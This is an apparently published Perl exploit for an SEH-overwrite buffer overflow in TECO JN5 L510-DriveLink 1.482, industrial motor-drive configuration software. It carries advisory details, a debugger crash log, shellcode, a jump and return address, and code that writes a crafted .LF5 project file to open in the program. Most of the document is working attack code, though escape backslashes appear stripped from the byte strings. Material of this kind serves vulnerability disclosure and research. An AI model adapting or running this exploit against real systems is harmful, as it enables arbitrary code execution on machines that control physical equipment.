TECO JN5 L510-DriveLink 1.482 SEH Overwrite Buffer Overflow
Posted on 17 November 2015
#!/usr/bin/perl # # # TECO JN5 L510-DriveLink 1.482 SEH Overwrite Buffer Overflow Exploit # # # Vendor: TECO Electric and Machinery Co., Ltd. # Product web page: http://www.teco-group.eu # Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9 # Affected version: 1.482 and 1.462 # # Summary: JN5 DriveLink is a free program that enables you to # configure the AC Motor Drive, 510 Series PC-Link. It provides # support for sleep and fire modes favourable for pumps, fans, # compressors, and HVAC and communication network protocol of # Modbus/ BACnet/ Metasys N2. # # Desc: The vulnerability is caused due to a boundary error in the # processing of a project file, which can be exploited to cause a # buffer overflow when a user opens e.g. a specially crafted .LF5 file. # Successful exploitation could allow execution of arbitrary code on # the affected machine. # # --------------------------------------------------------------------------------- # (14c0.12ec): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Windowssystem32MFC42.DLL - # *** WARNING: Unable to verify checksum for C:Program Files (x86)TECOJN5 DriveLinkL510-DriveLinkL510-DriveLink.exe # *** ERROR: Module load completed but symbols could not be loaded for C:Program Files (x86)TECOJN5 DriveLinkL510-DriveLinkL510-DriveLink.exe # eax=000026a0 ebx=0018f430 ecx=41414141 edx=00000001 esi=0018f408 edi=ffffd961 # eip=70735d7e esp=0018f350 ebp=0018f364 iopl=0 nv up ei ng nz na po nc # cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210282 # MFC42!Ordinal2740+0xaa: # 70735d7e 8b01 mov eax,dword ptr [ecx] ds:002b:41414141=???????? # 0:000> !exchain # 0018f3e4: 41414141 # Invalid exception stack at 41414141 # --------------------------------------------------------------------------------- # # Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit # Microsoft Windows 7 Ultimate SP1 (EN) 64bit # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2015-5279 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5279.php # # # 09.10.2015] # my $header = "x04x00x00x00x0Ax00x00x00x4Cx35x31x30x2Dx31". "x50x32x2Dx48x0Ex00x00x00x14x00x00x00x01x00"; # 113 bytes MessageBox shellcode my $sc = "x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42". "x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03". "x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b". "x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e". "x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c". "x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x65x64". "x21x01x68x20x50x77x6ex68x20x5ax53x4cx89xe1xfe". "x49x0bx31xc0x51x50xffxd7"; my $buffer = "A" x 43 . "xEBx06x90x90" . "xB0x5Dx40x00" . "x90" x 16 . $sc . "x90" x 20 . "D" x 2627; my $file = "Gaming Nerdz.lf5"; my $junk = $header.$buffer; open($FILE,">$file"); print $FILE "$junk"; close($FILE); print "Malicious LF5 file created successfully! ";
